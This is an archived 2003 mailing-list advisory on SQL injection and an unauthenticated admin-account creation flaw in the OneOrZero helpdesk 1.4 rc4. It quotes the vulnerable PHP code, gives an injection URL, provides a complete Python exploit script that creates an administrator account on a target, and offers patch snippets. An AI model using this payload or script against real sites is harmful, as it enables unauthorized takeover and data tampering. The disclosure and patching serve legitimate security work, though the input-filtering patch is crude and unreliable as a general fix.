Informations : °°°°°°°°°°°°°° Website : http://www.oneorzero.com Version : 1.4 rc4 Problems : - SQL Injection - Admin Access PHP Code/Location : °°°°°°°°°°°°°°°°°°° supporter/tupdate.php : -------------------------------------------------------------------------- if($groupid == 'change'){ $sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id"; $result = $db->query($sql); } -------------------------------------------------------------------------- admin/install.php : ---------------------------------------------------------------------------------------------------------------------------- [...] if($step == 2){ echo "<br><br>"; start("Helpdesk Installation", "center"); if($HTTP_POST_VARS['first'] == ''){ showError("first name"); $flag = 1; } if($HTTP_POST_VARS['last'] == ''){ showError("last name"); $flag = 1; } if($HTTP_POST_VARS['user'] == ''){ showError("user name"); $flag = 1; } if($HTTP_POST_VARS['email'] == ''){ showError("email address"); $flag = 1; } if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){ showError("password"); $flag = 1; } if($HTTP_POST_VARS['office'] == ''){ showError("office"); $flag = 1; } if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){ showError("password"); $flag = 1; } if(!validEmail($HTTP_POST_VARS['email'])){ showError("email"); $flag = 1; } if($flag == 1){ endit(); exit; } [...] $pwd = md5($HTTP_POST_VARS['pwd1']); $query = "INSERT IGNORE into $mysql_users_table VALUES(NULL, '".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."', '".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '', '".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."', 1, 1, 1, 'default', null, null, null, 0, 'English', '0')"; $db->query($query); [...] ---------------------------------------------------------------------------------------------------------------------------- Exploits : °°°°°°°° - http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10 will change the description of the ticket number 10 into "abcd" (char(97,98,99,100)) - To exploit the second one, in python 2.2 : -------------------------------------------------------------------------------------------------------------------------- import urlparse import httplib import string OneOrZero("http://www.target.com","80","NewUserName","NewPassword") class OneOrZero: def __init__(self,target,port,user,password): if port != "": self.port=str(port) else : self.port="80" self.path=str(urlparse.urlparse(target)[2]) self.target=str(urlparse.urlparse(target)[1]) self.user=str(user) self.password=str(password) self.USER_AGENT='OneOrZero.py' self.CreateAdminAccount() def CreateAdminAccount(self): data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=aat_private&office=abcd' try : print "Connecting On "+self.target+"...\n" http=httplib.HTTP(self.target,self.port) print "Sending Data On "+self.target+"...\n" http.putrequest("POST",self.path+"/admin/install.php") http.putheader("Content-Type","application/x-www-form-urlencoded") http.putheader("User-Agent",self.USER_AGENT) http.putheader("Host",self.target) http.putheader("Content-Length",str(len(data))) http.endheaders() http.send(data) code,msg,headers = http.getreply() print "HTTP Code : ",str(code) print "HTTP Connection : ",msg print "HTTP headers : \n",headers,"\n" file=http.getfile() if string.find(file.read(),"Administrator Account Created Successfully.") != -1: print "Congratulations, Administrator Account Created Successfully." print "You Can Log In Here : http://"+self.target+self.path+"/admin/control.php" print "User : ",self.user print "Password : ",self.password else : print "Administrator Account Hasn't Been Created." except : print "Error During Admin Account Creation." -------------------------------------------------------------------------------------------------------------------------- You just have to change the line : OneOrZero("http://www.target.com","80","NewUserName","NewPassword") Solution : °°°°°°°° A patch (and more details in French) can be found on http://www.phpsecure.info. - In supporter/tupdate.php, add the lines (at the begin) : ------------------------------------------------------------------------------------------------- foreach ($_REQUEST as $key=>$value) { if (get_magic_quotes_gpc()==0) { $value = addslashes($value); // This will reproduce the option magic_quotes_gpc=1 } $value = str_replace('(','()',$value); ${$key} = $value; $_REQUEST[$key] = $value; if (isset($_POST[$key])) { $_POST[$key] = $value; } if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; } if (isset($_FILE[$key])) { $_FILE[$key] = $value; } if (isset($_GET[$key])) { $_GET[$key] = $value; } if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; } if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value; } if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; } if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; } } ------------------------------------------------------------------------------------------------- - In admin/install.php, put the lines : --------------------------------------------------------------- $sql = "SELECT * FROM $mysql_users_table WHERE id > 0"; $result = $db->query($sql); $num_rows = $db->num_rows($result); if ($num_rows > 0){ die("<b>OneOrZero Is Already Installed.</b>"); } --------------------------------------------------------------- just after : --------------- if($step == 2){ --------------- frog-m@n _________________________________________________________________ Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail
This archive was generated by hypermail 2b30 : Thu May 15 2003 - 22:39:14 PDT